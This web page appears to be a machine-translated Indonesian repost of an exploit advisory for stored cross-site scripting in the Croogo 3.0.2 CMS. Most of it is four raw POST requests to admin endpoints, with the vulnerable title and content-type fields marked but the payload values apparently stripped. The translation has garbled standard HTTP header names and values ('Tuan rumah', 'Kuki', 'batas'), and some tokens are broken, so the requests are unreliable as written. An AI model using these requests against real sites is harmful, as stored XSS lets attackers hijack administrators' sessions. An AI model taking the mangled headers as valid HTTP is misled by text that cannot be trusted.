Croogo 3.0.2 Cross Site Scripting

  • Whatsapp
Croogo 3.0.2 Cross Site Scripting
Croogo Cross Site Scripting

News.nextcloud.asia

# Judul Eksploitasi: Croogo 3.0.2 – Skrip Lintas Situs Tersimpan ‘Banyak’ (XSS)
# Tanggal: 06/12/2021
# Eksploitasi Penulis: Enes zeser
# Beranda Vendor: https://croogo.org/
# Tautan Perangkat Lunak: https://downloads.croogo.org/v3.0.2.zip
# Versi: 3.0.2
# Diuji pada: Windows 10 Home Single Language 20H2 & WampServer 3.2.3

==> Skrip Lintas Situs Tersimpan ‘Tipe-Konten’ (/admin/manajer file/lampiran/tambahkan) <==

POST /admin/file-manager/attachments/tambahkan HTTP/1.1
Tuan rumah: (Pembawa Acara)
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Terima-Bahasa: tr-TR, tr; q = 0.8, en-US; q = 0.5, en; q = 0.3
Terima-Encoding: gzip, deflate
Content-Type: multipart/form-data; batas=—————————114221148012003093972656004730
Konten-Panjang: 923
Asal: http://(HOST)
Koneksi: tutup
Perujuk: http://(HOST)/admin/file-manager/attachments/add
Kuki: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs-Ambil Detik: asal yang sama
Pengguna Pengambilan Detik: ?1

—————————–114221148012003093972656004730
Isi-Disposisi: formulir-data; nama=”_metode”

POS
—————————–114221148012003093972656004730
Isi-Disposisi: formulir-data; nama=”_csrfToken”

c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
—————————–114221148012003093972656004730
Isi-Disposisi: formulir-data; nama=”berkas”; nama file = “file.txt”
Jenis Konten:

Enes Ozeser
—————————–114221148012003093972656004730
Isi-Disposisi: formulir-data; nama=”_Token[fields]”

16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
—————————–114221148012003093972656004730
Isi-Disposisi: formulir-data; nama=”_Token[unlocked]”

—————————–114221148012003093972656004730–

==> ‘title’ Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==

POST /admin/taxonomy/types/edit/5 HTTP/1.1
Tuan rumah: (Pembawa Acara)
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Terima-Bahasa: tr-TR, tr; q = 0.8, en-US; q = 0.5, en; q = 0.3
Terima-Encoding: gzip, deflate
Tipe Konten: application/x-www-form-urlencoded
Konten-Panjang: 590
Asal: http://(HOST)
Koneksi: tutup
Perujuk: http://(HOST)admin/taxonomy/types/edit/5
Kuki: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs-Ambil Detik: asal yang sama
Pengguna Pengambilan Detik: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994a&bef968
title=&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_terapkan

==> ‘title’ Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==

POST /admin/blocks/regions/edit/3 HTTP/1.1
Tuan rumah: (Pembawa Acara)
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Terima-Bahasa: tr-TR, tr; q = 0.8, en-US; q = 0.5, en; q = 0.3
Terima-Encoding: gzip, deflate
Tipe Konten: application/x-www-form-urlencoded
Konten-Panjang: 336
Asal: http://(HOST)
Koneksi: tutup
Perujuk: http://(HOST)/admin/blocks/regions/edit/3
Kuki: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs-Ambil Detik: asal yang sama
Pengguna Pengambilan Detik: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994a&bef968
title=&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_terapkan

==> ‘title’ Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==

POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Tuan Rumah: (Pembawa Acara)
Agen-Pengguna: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Terima: teks/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Terima-Bahasa: tr-TR, tr; q = 0.8, en-US; q = 0.5, en; q = 0.3
Terima-Encoding: gzip, deflate
Tipe Konten: application/x-www-form-urlencoded
Konten-Panjang: 363
Asal: http://(HOST)
Koneksi: tutup
Perujuk: http://(HOST)/admin/file-manager/attachments/edit/20
Kuki: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Peningkatan-Permintaan-Tidak Aman: 1
Detik-Ambil-Tujuan: dokumen
Sec-Fetch-Mode: navigasi
Situs-Ambil Detik: asal yang sama
Pengguna Pengambilan Detik: ?1

_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994a&bef968
title=&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_terapkan

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *